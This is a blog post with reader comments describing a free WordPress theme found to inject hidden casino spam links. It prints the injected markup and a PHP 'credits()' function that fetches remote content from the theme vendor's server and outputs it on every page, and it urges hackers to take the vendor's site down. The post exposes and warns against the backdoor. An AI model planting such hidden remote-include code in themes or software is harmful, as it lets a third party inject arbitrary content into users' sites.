Today I noticed a JavaScript error on my site, on investigation I saw the following JavaScript code in the page source:
var CCounter=2151068; var CCsite=www.chapter31.com; CCinvisible=0; <nosc/ript><a hreflang="de" lang="de" href="http://www.portalux.com/">online casino</a></nosc/ript> var CCounter=2151068; var CCsite=www.chapter31.com; CCinvisible=0;
My investigations found that where I downloaded the template from was a nice (NOT) little site called http://www.templatesbrowser.com/. Now what they do is add a “functions.php” file in the original code base, then call a method from the footer “credits();” which is in the functions.php file:
<?php
function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>
More information was found from www.onnoot.com/:
This produces a link at the bottom of every WordPress page, that is invisible for human readers.
Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We’re not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google’s search result pages.
So for those who don’t know I hope this was useful, if any people out there are crackers/hackers do me a favour and pull their site down 
10 Comments
So… you downloaded a bunch of php code from a template website and simply ran it without checking first?
errm.. there might be a flaw in this type of workflow.
Yet another reason to use BlogCFC and not WordPress.
@FastEddie – well yeah I suppose that wasn’t the smartest thing to do!
@Todd – yep, I use BlogCFC at work a bit. To be honest you just can’t beat the hosting plan I’m on at the moment which only has PHP. I am considering getting another plan which will cost a bit but give me ColdFusion. I/when that happens I’ll look to move to BlogCFC or MachBlog etc
@todd – not to dis Blog.CFC, but there are a lot more cool Wordpress themes than BlogCFC themes!
Hmm…maybe there’s some opportunity there…
I have been a frequent visitor of this blog for some time now, so I thought it would be a good idea to leave you with my thanks.
Regards,
Jim Mirkalami
I like your blog theme. I want to use it on my blog.
Can you please tell me from where I can download these theme?
Many thanks
——————————————————————————–
Dan owner of the future gadgets blog future gadgets and inventions
ha, thanks. I had the same.
I am having a similair problem. I downloaded a theme from templatebrowser.com and am getting a casino link added to my database. I’ve changed my admin password and have deleted the link a couple times, but it keeps coming back. Any other ideas? The code you’ve described doesn’t exist in my codebase. Maybe I’ll just use another theme.
@Nick – I wouldn’t EVER use a theme from templatebrowser.
They could have put anything in the code anywhere. Much safer to try and go with something ‘official’.
This isn’t just for spam content in your database, the theme could have malicious code to ‘phone home’ with your login details etc.
Not good.
I changed to a different template I had downloaded, but I had the same issue; it was probably another one from templatebrowser.com. I downloaded a template from wordpress.org and no longer have the issue. I will post about this issue and link to yours to help spread the word. Thank you!